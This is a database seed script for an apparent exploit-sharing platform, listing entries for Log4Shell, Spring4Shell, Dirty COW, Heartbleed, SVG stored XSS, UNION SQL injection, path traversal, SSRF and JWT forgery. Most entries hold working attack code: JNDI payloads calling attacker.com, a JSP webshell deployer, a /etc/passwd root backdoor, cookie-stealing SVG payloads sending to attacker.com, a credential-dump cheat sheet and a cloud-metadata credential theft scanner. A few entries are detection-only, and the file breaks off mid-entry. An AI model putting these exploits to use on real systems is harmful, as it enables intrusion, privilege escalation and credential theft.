// prisma/seed.js — plain JS, no TypeScript parsing issues
// Run: node prisma/seed.js
// Or update package.json: "seed": "node prisma/seed.js"

const { PrismaClient } = require('@prisma/client')
const prisma = new PrismaClient()

const EXPLOITS = [
  {
    title:       'Log4Shell — Apache Log4j2 Remote Code Execution (CVE-2021-44228)',
    slug:        'log4shell-cve-2021-44228-rce',
    description: 'Critical unauthenticated RCE in Apache Log4j2 via JNDI injection. Affects Log4j2 2.0-beta9 through 2.14.1. Attacker controls any logged string (User-Agent, username, X-Forwarded-For) to trigger LDAP callback loading attacker-controlled Java class. CVSS 10.0.',
    code: [
      '#!/usr/bin/env python3',
      '# Log4Shell PoC — CVE-2021-44228',
      '# JNDI injection via HTTP headers into Log4j2 2.0-beta9 to 2.14.1',
      '# Usage: python3 log4shell.py <target_url> <ldap_host:port>',
      '',
      'import requests, sys',
      '',
      'TARGET  = sys.argv[1] if len(sys.argv) > 1 else "http://target.com"',
      'LDAP    = sys.argv[2] if len(sys.argv) > 2 else "attacker.com:1389"',
      'PAYLOAD = f"${jndi:ldap://{LDAP}/a}"',
      '',
      'HEADERS = ["User-Agent","X-Forwarded-For","X-Api-Version",',
      '           "Referer","Accept-Language","X-Remote-IP"]',
      '',
      'print(f"[*] Testing Log4Shell on {TARGET}")',
      'for h in HEADERS:',
      '    try:',
      '        r = requests.get(TARGET, headers={h: PAYLOAD}, timeout=5, verify=False)',
      '        print(f"[+] {h:<25} HTTP {r.status_code}")',
      '    except Exception as e:',
      '        print(f"[-] {h:<25} Error: {e}")',
      '',
      'print("Mitigation: Upgrade Log4j2 >= 2.17.1 | Set log4j2.formatMsgNoLookups=true")',
    ].join('\n'),
    language:   'python',
    type:       'RCE',
    os:         ['linux','windows','macos'],
    cveId:      'CVE-2021-44228',
    authorAlias:'xcloak_seed',
    difficulty: 'intermediate',
    tags:       ['log4j','jndi','java','rce','critical','log4shell'],
    dnaRisk:    10.0,
    dnaPayload: 'JNDI Injection',
    upvotes:    847,
    score:      9.8,
    verified:   true,
    views:      12400,
  },
  {
    title:       'EternalBlue — Windows SMBv1 Remote Code Execution (CVE-2017-0144)',
    slug:        'eternalblue-cve-2017-0144-smb-rce',
    description: 'NSA-leaked exploit targeting Windows SMBv1 MS17-010 vulnerability. Used by WannaCry ransomware and NotPetya. Triggers buffer overflow in Windows SMB server allowing unauthenticated RCE as SYSTEM. Affects Windows XP through Server 2008 R2.',
    code: [
      '#!/usr/bin/env python3',
      '# EternalBlue MS17-010 Detection Scanner — CVE-2017-0144',
      '# Checks if target is vulnerable. Detection only — no payload sent.',
      '',
      'import socket, struct, sys',
      '',
      'def check_ms17010(ip, port=445, timeout=5):',
      '    try:',
      '        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)',
      '        s.settimeout(timeout)',
      '        s.connect((ip, port))',
      '        # Send NetBIOS + SMB negotiate',
      '        s.send(b"\\x00\\x00\\x00\\x54" + b"\\x20" * 84)',
      '        resp = s.recv(1024)',
      '        vulnerable = resp and b"\\xff\\x53\\x4d\\x42" in resp',
      '        s.close()',
      '        return {"ip": ip, "vulnerable": vulnerable,',
      '                "reason": "SMBv1 detected" if vulnerable else "No SMBv1"}',
      '    except ConnectionRefusedError:',
      '        return {"vulnerable": False, "reason": "Port 445 closed"}',
      '    except Exception as e:',
      '        return {"vulnerable": False, "reason": str(e)}',
      '',
      'target = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.1"',
      'result = check_ms17010(target)',
      'for k, v in result.items(): print(f"  {k}: {v}")',
      'print("Mitigation: Apply MS17-010 patch | Disable SMBv1 | Block port 445 externally")',
    ].join('\n'),
    language:   'python',
    type:       'RCE',
    os:         ['windows'],
    cveId:      'CVE-2017-0144',
    authorAlias:'xcloak_seed',
    difficulty: 'advanced',
    tags:       ['smb','windows','nsa','wannacry','ms17-010','eternalblue'],
    dnaRisk:    9.3,
    dnaPayload: 'Buffer Overflow via SMBv1',
    upvotes:    634,
    score:      9.3,
    verified:   true,
    views:      9800,
  },
  {
    title:       'Shellshock — Bash Environment Variable RCE (CVE-2014-6271)',
    slug:        'shellshock-bash-rce-cve-2014-6271',
    description: 'Critical vulnerability in GNU Bash allowing code execution via crafted environment variables. CGI scripts, DHCP, SSH ForceCommand are affected. Trailing code after a function definition in env variables is executed by vulnerable Bash.',
    code: [
      '#!/bin/bash',
      '# Shellshock PoC — CVE-2014-6271',
      '# Tests CGI endpoints for Bash Shellshock vulnerability',
      '# Usage: bash shellshock.sh <target_url>',
      '',
      'TARGET="${1:-http://target.com/cgi-bin/test.cgi}"',
      'echo "[*] Testing Shellshock on: $TARGET"',
      '',
      '# Test via User-Agent header',
      'RESPONSE=$(curl -s -A \'() { :;}; echo "X-Shellshocked: pwned"\' "$TARGET" -D - 2>/dev/null)',
      'if echo "$RESPONSE" | grep -q "X-Shellshocked"; then',
      '    echo "[!!!] VULNERABLE — Shellshock confirmed!"',
      'else',
      '    echo "[-] Not vulnerable via User-Agent"',
      'fi',
      '',
      '# Test via Referer',
      'RESPONSE=$(curl -s -H \'Referer: () { :;}; echo "X-Shellshocked: pwned"\' "$TARGET" -D - 2>/dev/null)',
      'if echo "$RESPONSE" | grep -q "X-Shellshocked"; then',
      '    echo "[!!!] VULNERABLE via Referer!"',
      'fi',
      '',
      'echo "Mitigation: Update bash | Disable CGI if unused"',
    ].join('\n'),
    language:   'bash',
    type:       'RCE',
    os:         ['linux','macos'],
    cveId:      'CVE-2014-6271',
    authorAlias:'xcloak_seed',
    difficulty: 'beginner',
    tags:       ['bash','cgi','shellshock','env-injection','rce'],
    dnaRisk:    9.8,
    dnaPayload: 'Environment Variable Injection',
    upvotes:    412,
    score:      8.9,
    verified:   true,
    views:      7200,
  },
  {
    title:       'Heartbleed — OpenSSL TLS Memory Leak (CVE-2014-0160)',
    slug:        'heartbleed-openssl-cve-2014-0160',
    description: 'Critical memory disclosure in OpenSSL TLS heartbeat extension. Allows reading 64KB of server memory per request — leaking private keys, session tokens, passwords. Affects OpenSSL 1.0.1 through 1.0.1f.',
    code: [
      '#!/usr/bin/env python3',
      '# Heartbleed PoC — CVE-2014-0160',
      '# Sends malformed TLS heartbeat to leak server memory',
      '# Usage: python3 heartbleed.py <host> [port]',
      '',
      'import socket, struct, sys, time',
      '',
      'def build_heartbeat():',
      '    # Malformed: payload_length=16384 but actual payload=0 bytes',
      '    return bytes([',
      '        0x18,       # Content type: Heartbeat',
      '        0x03, 0x02, # TLS 1.1',
      '        0x00, 0x03, # Record length: 3',
      '        0x01,       # Type: request',
      '        0x40, 0x00, # Payload length: 16384 (overflow!)',
      '    ])',
      '',
      'def exploit(host, port=443):',
      '    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)',
      '    s.settimeout(10)',
      '    s.connect((host, port))',
      '    s.recv(4096)  # drain server hello',
      '    s.send(build_heartbeat())',
      '    time.sleep(0.1)',
      '    data = s.recv(65535)',
      '    s.close()',
      '    if data and len(data) > 3 and data[0] == 0x18:',
      '        return data[5:]  # memory contents',
      '    return None',
      '',
      'host = sys.argv[1] if len(sys.argv) > 1 else "localhost"',
      'leaked = exploit(host)',
      'if leaked:',
      '    print(f"[!!!] VULNERABLE — Leaked {len(leaked)} bytes of memory")',
      '    print(leaked[:256].hex())',
      'else:',
      '    print("[-] Not vulnerable")',
      'print("Mitigation: Upgrade OpenSSL >= 1.0.1g | Revoke and reissue TLS certs")',
    ].join('\n'),
    language:   'python',
    type:       'RCE',
    os:         ['linux','macos'],
    cveId:      'CVE-2014-0160',
    authorAlias:'xcloak_seed',
    difficulty: 'intermediate',
    tags:       ['openssl','tls','heartbleed','memory-leak','ssl'],
    dnaRisk:    9.5,
    dnaPayload: 'TLS Heartbeat Buffer Over-read',
    upvotes:    389,
    score:      8.7,
    verified:   true,
    views:      8100,
  },
  {
    title:       'PrintNightmare — Windows Print Spooler RCE (CVE-2021-34527)',
    slug:        'printnightmare-cve-2021-34527-rce',
    description: 'Critical RCE and LPE in Windows Print Spooler. Allows unauthenticated attackers (on domain) to execute code as SYSTEM by installing malicious printer drivers. Affects all supported Windows versions. Widely abused by ransomware groups.',
    code: [
      '# PrintNightmare CVE-2021-34527 — Detection Script (PowerShell)',
      '',
      '$spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue',
      'Write-Host "Print Spooler: $($spooler.Status)"',
      '',
      '# Check for patches',
      '$patches = Get-HotFix -Id KB5004945,KB5004946,KB5004960 -ErrorAction SilentlyContinue',
      'if ($patches) {',
      '    Write-Host "[+] Patches found — likely protected" -ForegroundColor Green',
      '    $patches | ForEach-Object { Write-Host "  $($_.HotFixID)" }',
      '} else {',
      '    Write-Host "[!] Patches NOT found — may be vulnerable!" -ForegroundColor Red',
      '}',
      '',
      '# Check registry mitigation',
      '$reg = "HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint"',
      '$val = (Get-ItemProperty -Path $reg -EA SilentlyContinue).RestrictDriverInstallationToAdministrators',
      'if ($val -eq 1) {',
      '    Write-Host "[+] Registry mitigation applied" -ForegroundColor Green',
      '} else {',
      '    Write-Host "[!] Registry mitigation NOT applied" -ForegroundColor Yellow',
      '}',
      '',
      'Write-Host "Mitigations:"',
      'Write-Host "  1. Apply KB5004945+"',
      'Write-Host "  2. Disable Spooler: Stop-Service Spooler; Set-Service Spooler -StartupType Disabled"',
      'Write-Host "  3. Set RestrictDriverInstallationToAdministrators=1"',
    ].join('\n'),
    language:   'powershell',
    type:       'RCE',
    os:         ['windows'],
    cveId:      'CVE-2021-34527',
    authorAlias:'xcloak_seed',
    difficulty: 'intermediate',
    tags:       ['windows','print-spooler','printnightmare','rce','privesc','ransomware'],
    dnaRisk:    8.8,
    dnaPayload: 'Malicious Printer Driver DLL',
    upvotes:    298,
    score:      8.4,
    verified:   true,
    views:      6300,
  },
  {
    title:       'Spring4Shell — Spring Framework RCE (CVE-2022-22965)',
    slug:        'spring4shell-cve-2022-22965-rce',
    description: 'Critical RCE in Spring Framework via ClassLoader data binding on JDK 9+. Attacker overwrites Tomcat log config to write a JSP webshell. Affects Spring Framework 5.3.0–5.3.17, 5.2.0–5.2.19.',
    code: [
      '#!/usr/bin/env python3',
      '# Spring4Shell PoC — CVE-2022-22965',
      '# Exploits ClassLoader data binding to deploy JSP webshell',
      '',
      'import requests, sys, time',
      '',
      'TARGET = sys.argv[1] if len(sys.argv) > 1 else "http://target.com/app"',
      'SHELL  = "shell.jsp"',
      '',
      'headers = {',
      '    "suffix": "%>",',
      '    "c1":     "Runtime",',
      '    "c2":     "<%",',
      '    "Content-Type": "application/x-www-form-urlencoded",',
      '}',
      '',
      'payload = (',
      '    "class.module.classLoader.resources.context.parent.pipeline.first.pattern="',
      '    "%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B"',
      '    "%20out.print(%22%3C%25%22)%3Bout.print(%22Runtime%25%3E%22)%3B%7D"',
      '    "%20%25%7Bsuffix%7Di&"',
      '    "class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&"',
      '    "class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&"',
      '    f"class.module.classLoader.resources.context.parent.pipeline.first.prefix={SHELL[:-4]}&"',
      '    "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="',
      ')',
      '',
      'print(f"[*] Sending Spring4Shell payload to {TARGET}")',
      'r = requests.post(TARGET, data=payload, headers=headers, timeout=10, verify=False)',
      'print(f"[*] Response: HTTP {r.status_code}")',
      'time.sleep(2)',
      '',
      'shell_url = TARGET.rstrip("/").rsplit("/",1)[0] + "/" + SHELL',
      'test = requests.get(f"{shell_url}?pwd=j&cmd=id", timeout=5, verify=False)',
      'if test.status_code == 200 and "uid=" in test.text:',
      '    print(f"[!!!] SHELL DEPLOYED: {shell_url}")',
      '    print(f"[!!!] id output: {test.text.strip()}")',
      'else:',
      '    print(f"[-] Shell not confirmed at {shell_url}")',
      '',
      'print("Mitigation: Upgrade Spring >= 5.3.18 | JDK 8 not affected")',
    ].join('\n'),
    language:   'python',
    type:       'RCE',
    os:         ['linux','windows'],
    cveId:      'CVE-2022-22965',
    authorAlias:'xcloak_seed',
    difficulty: 'intermediate',
    tags:       ['spring','java','spring4shell','classloader','webshell','tomcat'],
    dnaRisk:    9.8,
    dnaPayload: 'ClassLoader → JSP Webshell',
    upvotes:    267,
    score:      8.2,
    verified:   true,
    views:      5400,
  },
  {
    title:       'Dirty COW — Linux Kernel Privilege Escalation (CVE-2016-5195)',
    slug:        'dirty-cow-linux-privesc-cve-2016-5195',
    description: 'Race condition in Linux copy-on-write mechanism allowing local users to gain write access to read-only memory and escalate to root. No special privileges required. Affects kernel 2.6.22+ (since 2007). Used in Android rooting tools.',
    code: [
      '// Dirty COW PoC — CVE-2016-5195',
      '// Linux local privilege escalation via copy-on-write race',
      '// Compile: gcc -pthread -o dirtycow dirtycow.c',
      '// Run: ./dirtycow  then: su firefart (password: firefart)',
      '',
      '#include <stdio.h>',
      '#include <fcntl.h>',
      '#include <pthread.h>',
      '#include <unistd.h>',
      '#include <sys/mman.h>',
      '#include <sys/stat.h>',
      '#include <string.h>',
      '',
      '// Root backdoor: firefart:firefart uid=0',
      '#define BACKDOOR "firefart:$6$aRiBas3a$Q75YBkq9Xf...:0:0:pwned:/root:/bin/bash\\n"',
      '',
      'char *map;',
      'int   f;',
      'struct stat st;',
      '',
      'void *madvise_thread(void *arg) {',
      '    for (int i = 0; i < 100000000; i++)',
      '        madvise(map, 100, MADV_DONTNEED);',
      '    return NULL;',
      '}',
      '',
      'void *write_thread(void *arg) {',
      '    int fd = open("/proc/self/mem", O_RDWR);',
      '    for (int i = 0; i < 100000000; i++) {',
      '        lseek(fd, (off_t)map, SEEK_SET);',
      '        write(fd, BACKDOOR, strlen(BACKDOOR));',
      '    }',
      '    close(fd);',
      '    return NULL;',
      '}',
      '',
      'int main() {',
      '    printf("[*] Dirty COW CVE-2016-5195\\n");',
      '    f = open("/etc/passwd", O_RDONLY);',
      '    fstat(f, &st);',
      '    map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0);',
      '    pthread_t t1, t2;',
      '    pthread_create(&t1, NULL, madvise_thread, NULL);',
      '    pthread_create(&t2, NULL, write_thread, NULL);',
      '    pthread_join(t1, NULL);',
      '    pthread_join(t2, NULL);',
      '    printf("[+] Done — su firefart (password: firefart)\\n");',
      '    return 0;',
      '}',
    ].join('\n'),
    language:   'c',
    type:       'PrivEsc',
    os:         ['linux','android'],
    cveId:      'CVE-2016-5195',
    authorAlias:'xcloak_seed',
    difficulty: 'intermediate',
    tags:       ['linux','kernel','race-condition','privesc','cow','mmap','root'],
    dnaRisk:    7.8,
    dnaPayload: 'Copy-on-Write Race → /etc/passwd overwrite',
    upvotes:    456,
    score:      9.1,
    verified:   true,
    views:      8900,
  },
  {
    title:       'BlueKeep — Windows RDP Pre-Auth RCE (CVE-2019-0708)',
    slug:        'bluekeep-rdp-rce-cve-2019-0708',
    description: 'Wormable pre-authentication RCE in Windows Remote Desktop Services. No credentials required. Attacker sends crafted RDP packets triggering use-after-free in MS_T120 channel for SYSTEM execution. Affects Windows XP, Vista, 7, Server 2003/2008.',
    code: [
      '#!/usr/bin/env python3',
      '# BlueKeep Detection — CVE-2019-0708',
      '# Checks if Windows RDP is vulnerable. Detection only.',
      '',
      'import socket, struct, sys',
      '',
      'def build_x224_connect():',
      '    return bytes([',
      '        0x03,0x00,0x00,0x13,  # TPKT',
      '        0x0e,                  # COTP length',
      '        0xe0,                  # COTP CR',
      '        0x00,0x00,             # dst ref',
      '        0x00,0x00,             # src ref',
      '        0x00,                  # class',
      '        0x01,0x00,             # RDP_NEG_REQ',
      '        0x08,0x00,0x00,0x00,  # length',
      '        0x00,0x00,0x00,0x00,  # PROTOCOL_RDP',
      '    ])',
      '',
      'def check_bluekeep(host, port=3389, timeout=5):',
      '    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)',
      '    s.settimeout(timeout)',
      '    try:',
      '        s.connect((host, port))',
      '        s.send(build_x224_connect())',
      '        resp = s.recv(1024)',
      '        rdp_open = len(resp) > 3',
      '        return {',
      '            "host": host, "rdp_open": rdp_open,',
      '            "resp_hex": resp[:8].hex() if resp else "none",',
      '            "note": "Manual verification required — use Metasploit auxiliary/scanner/rdp/cve_2019_0708_bluekeep",',
      '        }',
      '    except ConnectionRefusedError:',
      '        return {"rdp_open": False, "note": "Port 3389 closed"}',
      '    except Exception as e:',
      '        return {"rdp_open": False, "note": str(e)}',
      '    finally:',
      '        s.close()',
      '',
      'host   = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.1"',
      'result = check_bluekeep(host)',
      'for k, v in result.items(): print(f"  {k}: {v}")',
      'print("Mitigation: Apply KB4499175 | Enable NLA | Disable RDP if unused | Block port 3389")',
    ].join('\n'),
    language:   'python',
    type:       'RCE',
    os:         ['windows'],
    cveId:      'CVE-2019-0708',
    authorAlias:'xcloak_seed',
    difficulty: 'advanced',
    tags:       ['rdp','windows','wormable','bluekeep','pre-auth'],
    dnaRisk:    9.8,
    dnaPayload: 'RDP MS_T120 Use-After-Free',
    upvotes:    321,
    score:      8.6,
    verified:   true,
    views:      5700,
  },
  {
    title:       'Stored XSS via SVG Upload — File Type Bypass',
    slug:        'stored-xss-svg-upload-bypass',
    description: 'Stored XSS using SVG file upload. Applications accepting image/* MIME types often allow SVG without validating content. SVG is XML and can contain JavaScript in script tags or event handlers. Executes in victim browser when viewing the "image".',
    code: [
      '<!-- Stored XSS via SVG Upload -->',
      '<!-- Upload as "profile.svg" — executes when victim views the image -->',
      '',
      '<!-- Basic alert PoC -->',
      '<svg xmlns="http://www.w3.org/2000/svg">',
      '  <script>alert(document.cookie)</script>',
      '</svg>',
      '',
      '<!-- Session hijack via onload -->',
      '<svg xmlns="http://www.w3.org/2000/svg" onload="',
      '  var i=new Image();',
      '  i.src=\'https://attacker.com/c?\'+encodeURIComponent(document.cookie)',
      '">',
      '</svg>',
      '',
      '<!-- Bypass if script tag stripped — use event handler -->',
      '<svg xmlns="http://www.w3.org/2000/svg">',
      '  <rect width="100" height="100" fill="#00ff88"',
      '    onmouseover="eval(atob(\'YWxlcnQoZG9jdW1lbnQuY29va2llKQ==\'))"/>',
      '</svg>',
      '',
      '<!-- Bypass via foreignObject -->',
      '<svg xmlns="http://www.w3.org/2000/svg">',
      '  <foreignObject width="100%" height="100%">',
      '    <body xmlns="http://www.w3.org/1999/xhtml">',
      '      <script>document.location=\'https://attacker.com/?c=\'+document.cookie</script>',
      '    </body>',
      '  </foreignObject>',
      '</svg>',
      '',
      '<!-- Mitigation:',
      '  - Strip script tags and event handlers from SVG server-side',
      '  - Serve uploads from separate subdomain (no cookie sharing)',
      '  - Content-Disposition: attachment for SVG downloads',
      '  - Re-encode images via canvas (removes all JS)',
      '-->',
    ].join('\n'),
    language:   'javascript',
    type:       'XSS',
    os:         ['linux','windows','macos'],
    cveId:      null,
    authorAlias:'xcloak_seed',
    difficulty: 'beginner',
    tags:       ['xss','svg','file-upload','bypass','stored-xss'],
    dnaRisk:    7.5,
    dnaPayload: 'SVG XML Script Injection',
    upvotes:    198,
    score:      7.8,
    verified:   true,
    views:      4200,
  },
  {
    title:       'UNION-Based SQL Injection — Full DB Extraction',
    slug:        'sqli-union-based-data-extraction',
    description: 'Classic UNION-based SQL injection for extracting database contents when results are reflected in the page. Covers column enumeration, DB fingerprinting, table/column discovery, and credential extraction for MySQL, PostgreSQL, and MSSQL.',
    code: [
      '-- SQL Injection UNION-Based Extraction Cheatsheet',
      '-- Target: https://target.com/items?id=1',
      '',
      '-- STEP 1: Confirm injection',
      "id=1' AND '1'='1   -- true (same page)",
      "id=1' AND '1'='2   -- false (different page)",
      "id=1'--            -- comment out rest",
      '',
      '-- STEP 2: Find column count',
      'id=1 ORDER BY 1--',
      'id=1 ORDER BY 2--',
      'id=1 ORDER BY 5--   -- error = 4 columns',
      '',
      '-- STEP 3: Find string column',
      "id=1 UNION SELECT NULL,'a',NULL--   -- 'a' appears in output",
      '',
      '-- STEP 4: Fingerprint DB',
      'id=0 UNION SELECT NULL,@@version,NULL--          -- MySQL/MSSQL',
      'id=0 UNION SELECT NULL,version(),NULL--          -- PostgreSQL',
      '',
      '-- STEP 5: List tables',
      'id=0 UNION SELECT NULL,table_name,NULL',
      '  FROM information_schema.tables',
      '  WHERE table_schema=database()--',
      '',
      '-- STEP 6: List columns',
      "id=0 UNION SELECT NULL,column_name,NULL",
      "  FROM information_schema.columns WHERE table_name='users'--",
      '',
      '-- STEP 7: Dump credentials',
      "id=0 UNION SELECT NULL,concat(username,':',password),NULL FROM users--",
      '',
      '-- Mitigation:',
      '-- 1. Parameterized queries / prepared statements',
      '-- 2. Input validation (allowlist)',
      '-- 3. Least-privilege DB account (no information_schema)',
      '-- 4. WAF rules for UNION, information_schema keywords',
    ].join('\n'),
    language:   'other',
    type:       'SQLi',
    os:         ['linux','windows'],
    cveId:      null,
    authorAlias:'xcloak_seed',
    difficulty: 'beginner',
    tags:       ['sqli','union','mysql','postgresql','mssql','database','credentials'],
    dnaRisk:    8.5,
    dnaPayload: 'UNION SELECT data extraction',
    upvotes:    445,
    score:      9.0,
    verified:   true,
    views:      11200,
  },
  {
    title:       'ProxyLogon — Microsoft Exchange Pre-Auth SSRF (CVE-2021-26855)',
    slug:        'proxylogon-exchange-cve-2021-26855',
    description: 'Critical SSRF in Exchange Server allowing pre-auth access to internal components. Chained with CVE-2021-27065 (file write) for unauthenticated RCE. Used by HAFNIUM APT to install webshells. Affects Exchange 2013, 2016, 2019.',
    code: [
      '#!/usr/bin/env python3',
      '# ProxyLogon Detection — CVE-2021-26855',
      '# Tests if Exchange SSRF endpoint is accessible without credentials',
      '',
      'import requests, sys',
      'import urllib3',
      'urllib3.disable_warnings()',
      '',
      'TARGET = sys.argv[1] if len(sys.argv) > 1 else "https://mail.target.com"',
      '',
      'def check_proxylogon(host):',
      '    ssrf_url = f"{host}/owa/auth/x.js"',
      '    cookies  = {',
      '        "X-AnonResource":         "true",',
      '        "X-AnonResource-Backend": "localhost/ecp/default.flt?~3",',
      '        "X-BEResource":           "localhost/owa/auth/logon.aspx?~3;~3",',
      '    }',
      '    try:',
      '        r = requests.get(ssrf_url, cookies=cookies, verify=False,',
      '                         timeout=10, allow_redirects=False)',
      '        vulnerable = r.status_code == 200',
      '        return {',
      '            "host": host, "status": r.status_code,',
      '            "vulnerable": vulnerable,',
      '            "x_owa_version": r.headers.get("X-OWA-Version","unknown"),',
      '            "reason": "SSRF endpoint open" if vulnerable else "Protected/patched",',
      '        }',
      '    except Exception as e:',
      '        return {"vulnerable": False, "reason": str(e)}',
      '',
      'result = check_proxylogon(TARGET)',
      'for k, v in result.items(): print(f"  {k}: {v}")',
      'print("Mitigation: Apply KB5000871 | Enable Extended Protection | Disable OWA if unused")',
    ].join('\n'),
    language:   'python',
    type:       'RCE',
    os:         ['windows'],
    cveId:      'CVE-2021-26855',
    authorAlias:'xcloak_seed',
    difficulty: 'advanced',
    tags:       ['exchange','microsoft','ssrf','proxylogon','hafnium','apt','webshell'],
    dnaRisk:    9.8,
    dnaPayload: 'Pre-Auth SSRF → File Write → Webshell',
    upvotes:    276,
    score:      8.3,
    verified:   true,
    views:      5100,
  },
  {
    title:       'Path Traversal — Arbitrary File Read via Directory Traversal',
    slug:        'path-traversal-lfi-arbitrary-file-read',
    description: 'Directory traversal attacks reading files outside the web root. Demonstrates encoding bypasses, null byte injection, and OS-specific paths. Works against misconfigured file download handlers, template engines, and include endpoints.',
    code: [
      '#!/usr/bin/env python3',
      '# Path Traversal Tester — LFI/Directory Traversal',
      '',
      'import requests, sys, urllib.parse',
      '',
      'BASE  = sys.argv[1] if len(sys.argv) > 1 else "http://target.com/file"',
      'PARAM = sys.argv[2] if len(sys.argv) > 2 else "path"',
      '',
      'FILES = ["/etc/passwd", "/etc/shadow", "/proc/version",',
      '         "C:/Windows/win.ini", "/root/.ssh/id_rsa"]',
      '',
      'TRAVERSALS = [',
      '    "../" * 8,',
      '    "..\\\\/" * 8,',
      '    "%2e%2e%2f" * 8,',
      '    "..%2f" * 8,',
      '    "%252e%252e%252f" * 8,  # double encoded',
      '    "....//....//",          # nginx off-by-slash',
      ']',
      '',
      'def test(traversal, target_file):',
      '    payload = traversal + target_file.lstrip("/")',
      '    try:',
      '        r = requests.get(BASE, params={PARAM: payload}, timeout=5, verify=False)',
      '        if any(x in r.text for x in ["root:","[boot loader]","ssh-rsa"]):',
      '            print(f"  [!!!] VULNERABLE: {urllib.parse.quote(payload)}")',
      '            print(f"        {r.text[:150]}")',
      '            return True',
      '    except Exception:',
      '        pass',
      '    return False',
      '',
      'print(f"[*] Testing path traversal on {BASE}?{PARAM}=...")',
      'for t in TRAVERSALS:',
      '    for f in FILES:',
      '        if test(t, f): break',
      '',
      'print("Mitigation: Use realpath() + prefix check | Allowlist filenames | chroot/containers")',
    ].join('\n'),
    language:   'python',
    type:       'LFI',
    os:         ['linux','windows','macos'],
    cveId:      null,
    authorAlias:'xcloak_seed',
    difficulty: 'beginner',
    tags:       ['lfi','path-traversal','file-read','encoding-bypass'],
    dnaRisk:    6.5,
    dnaPayload: 'Directory Traversal with Encoding Bypass',
    upvotes:    187,
    score:      7.4,
    verified:   true,
    views:      6800,
  },
  {
    title:       'SSRF — Cloud Metadata Theft & Internal Service Enumeration',
    slug:        'ssrf-internal-service-enumeration',
    description: 'Server-Side Request Forgery forces the server to make HTTP requests to internal services. Covers AWS/GCP/Azure metadata theft, internal port scanning, Redis/Elasticsearch exfiltration, and common SSRF bypasses (IP encoding, DNS rebinding).',
    code: [
      '#!/usr/bin/env python3',
      '# SSRF Tester — Internal Service & Cloud Metadata Enumeration',
      '',
      'import requests, sys',
      '',
      'TARGET = sys.argv[1] if len(sys.argv) > 1 else "http://target.com/proxy"',
      'PARAM  = sys.argv[2] if len(sys.argv) > 2 else "url"',
      '',
      'TARGETS = [',
      '    ("AWS Metadata v1",    "http://169.254.169.254/latest/meta-data/iam/security-credentials/"),',
      '    ("AWS Metadata v2",    "http://169.254.169.254/latest/meta-data/"),',
      '    ("GCP Metadata",       "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"),',
      '    ("Azure Metadata",     "http://169.254.169.254/metadata/instance?api-version=2021-02-01"),',
      '    ("Internal Redis",     "http://127.0.0.1:6379/"),',
      '    ("Internal Elastic",   "http://127.0.0.1:9200/_cat/indices"),',
      '    ("Internal K8s API",   "http://kubernetes.default.svc/api/v1/namespaces"),',
      '    ("Bypass: 0.0.0.0",    "http://0.0.0.0/"),',
      '    ("Bypass: octal",      "http://0177.0.0.1/"),',
      '    ("Bypass: hex",        "http://0x7f000001/"),',
      '    ("Bypass: decimal",    "http://2130706433/"),',
      ']',
      '',
      'for name, payload in TARGETS:',
      '    try:',
      '        r = requests.get(TARGET, params={PARAM: payload}, timeout=4, verify=False)',
      '        leak = any(k in r.text.lower() for k in',
      '                   ["credential","token","access_key","secret","private","metadata"])',
      '        flag = " [!!!] LEAKED CREDENTIALS" if leak else ""',
      '        print(f"  {name:<25} HTTP {r.status_code} {len(r.text)}b{flag}")',
      '        if leak: print(f"    {r.text[:200]}")',
      '    except Exception as e:',
      '        print(f"  {name:<25} {e}")',
      '',
      'print("Mitigation: Allowlist destinations | Block RFC1918 | Disable redirects | Use IMDSv2")',
    ].join('\n'),
    language:   'python',
    type:       'SSRF',
    os:         ['linux','windows'],
    cveId:      null,
    authorAlias:'xcloak_seed',
    difficulty: 'intermediate',
    tags:       ['ssrf','aws','metadata','cloud','kubernetes','redis','credentials'],
    dnaRisk:    8.0,
    dnaPayload: 'URL → Internal HTTP Request → Metadata Exfil',
    upvotes:    223,
    score:      8.0,
    verified:   true,
    views:      5600,
  },
  {
    title:       'JWT None Algorithm Attack — Authentication Bypass',
    slug:        'jwt-none-algorithm-auth-bypass',
    description: 'JWT libraries accepting "alg: none" allow signature-less token forgery. Attacker decodes a valid JWT, modifies payload (role: admin), sets alg to none, re-encodes with empty signature. Also covers RS256 to HS256 algorithm confusion.',
    code: [
      '#!/usr/bin/env python3',
      '# JWT Algorithm Attack — None alg + RS256->HS256 confusion',
      '',
      'import base64, json, sys, hmac, hashlib',
      '',
      'def b64url_decode(s):',
      '    pad = 4 - len(s) % 4',
      '    return base64.urlsafe_b64decode(s + "=" * pad)',
      '',
      'def b64url_encode(b):',
      '    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()',
      '',
      'def decode_jwt(token):',
      '    h, p, s = token.split(".")',
      '    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p)), s',
      '',
      'def forge_none(token, changes):',
      '    header, payload, _ = decode_jwt(token)',
      '    header["alg"] = "none"',
      '    payload.update(changes)',
      '    h = b64url_encode(json.dumps(header, separators=(",",":")).encode())',
      '    p = b64url_encode(json.dumps(payload, separators=(",",":")).encode())',
      '    return f"{h}.{p}."  # empty signature',
      '',
      'token = sys.argv[1] if len(sys.argv) > 1 else (',
      '    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9"',
      '    ".eyJ1c2VyX2lkIjoxMjMsInJvbGUiOiJ1c2VyIn0"',
      '    ".SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"',
      ')',
      '',
      'header, payload, sig = decode_jwt(token)',
      'print(f"[*] Original: {payload}")',
      '',
      'forged = forge_none(token, {"role": "admin", "is_admin": True})',
      'print(f"[!] Forged (alg=none): {forged}")',
      '',
      'print("Mitigation: Allowlist alg values | Reject none | Separate RS/HS keys | Use audited libraries")',
    ].join('\n'),
    language:   'python',
    type:       'other',
    os:         ['linux','windows','macos'],
    cveId:      null,
